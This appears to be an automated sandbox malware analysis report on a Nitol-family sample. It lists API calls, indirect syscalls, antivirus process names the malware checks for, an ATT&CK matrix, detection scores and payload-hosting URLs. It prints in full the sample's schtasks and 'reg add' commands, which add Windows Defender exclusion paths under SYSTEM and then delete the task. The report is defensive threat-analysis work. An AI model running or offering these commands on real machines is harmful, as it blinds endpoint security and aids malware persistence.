Code function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_0000000140007C91

Source: C:\Users\user\Documents\qWXt7a.exe

Code function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_000000014000F000

Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Code function: 39_3_02590643 mov eax, dword ptr fs:[00000030h]	39_3_02590643
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Code function: 39_3_025900CD mov eax, dword ptr fs:[00000030h]	39_3_025900CD
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Code function: 39_3_00BB00CD mov eax, dword ptr fs:[00000030h]	39_3_00BB00CD
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Code function: 39_3_00BB0643 mov eax, dword ptr fs:[00000030h]	39_3_00BB0643

Source: C:\Users\user\Documents\qWXt7a.exe

Code function: 4_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,

4_2_0000000140004630

Source: C:\Users\user\Documents\qWXt7a.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0000000140007C91
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00000001400106B0
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_00000001400092E0 SetUnhandledExceptionFilter,	4_2_00000001400092E0
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_00007FFE13201F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FFE13201F50
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_00007FFE132076E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FFE132076E0
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_00007FFE13202630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FFE13202630
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Code function: 39_2_00BF2AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_00BF2AE2
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Code function: 39_2_00BF10CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_00BF10CC
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Code function: 39_2_00BF51FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_00BF51FB
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Code function: 41_2_009410CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_009410CC
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Code function: 41_2_00942AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_00942AE2
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Code function: 41_2_009451FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_009451FB

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\qWXt7a.exe	NtAllocateVirtualMemory: Indirect: 0x140006FD0	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	NtProtectVirtualMemory: Indirect: 0x2A0B253	Jump to behavior
Source: C:\Users\user\Desktop\0000000000000000.exe	NtDelayExecution: Indirect: 0x1F94D6	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	NtProtectVirtualMemory: Indirect: 0x2B6B253	Jump to behavior

Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe "C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior

Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior

Source: C:\Users\user\Documents\qWXt7a.exe

Code function: 4_2_00007FFE1320FD40 cpuid

4_2_00007FFE1320FD40

Source: C:\Users\user\Documents\qWXt7a.exe	Code function: GetLocaleInfoA,		4_2_000000014000F370
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Code function: GetLocaleInfoA,		41_2_00946B1A

Source: C:\Users\user\Documents\qWXt7a.exe

Code function: 4_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

4_2_000000014000A370

Source: C:\Users\user\Documents\qWXt7a.exe

Code function: 4_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

4_2_0000000140005A70

Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: Nw13Wr.exe, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360safe.exe
Source: Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: SuperKiller.exe
Source: Nw13Wr.exe, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: msmpeng.exe
Source: Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: Autoruns.exe
Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Safe.exe
Source: Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp, Nw13Wr.exe, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: Nw13Wr.exe, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Tray.exe
Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avgwdsvc.exe
Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: AYAgent.aye
Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Mcshield.exe
Source: qWXt7a.exe, 00000004.00000002.2310399884.00000000027D8000.00000002.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3519558183.0000000002FED000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected Nitol

Source: Yara match	File source: 39.2.Nw13Wr.exe.41103e8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Nw13Wr.exe.41103e8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Nw13Wr.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Nw13Wr.exe PID: 7976, type: MEMORYSTR

Remote Access Functionality

Yara detected Nitol

Source: Yara match	File source: 39.2.Nw13Wr.exe.41103e8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Nw13Wr.exe.41103e8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Nw13Wr.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Nw13Wr.exe PID: 7976, type: MEMORYSTR

Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,		4_2_00000001400042B0
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,		4_2_0000000140003F80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	113 Command and Scripting Interpreter	33 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	223 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Service Execution	1 Registry Run Keys / Startup Folder	33 Windows Service	1 Software Packing	NTDS	331 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Process Injection	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Scheduled Task/Job	32 Masquerading	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 Modify Registry	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
0000000000000000.exe	16%	ReversingLabs
0000000000000000.exe	20%	Virustotal		Browse
0000000000000000.exe	100%	Avira	HEUR/AGEN.1317034

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Nw13Wr\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\W9sgnm2c\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\Nw13Wr\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\W9sgnm2c\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	0%	ReversingLabs
C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	0%	ReversingLabs
C:\Users\Public\Music\destopbak.ini	0%	ReversingLabs
C:\Users\user\Documents\qWXt7a.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://%s/%d.dll	0%	Avira URL Cloud	safe
http://%s/%d.dllC:	0%	Avira URL Cloud	safe
http://www.extensis.com/meta/FontSense/	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/p	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/c.gif	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	0%	Avira URL Cloud	safe
http://www.npes.org/pdfx/ns/id/	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gift	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gifz	0%	Avira URL Cloud	safe
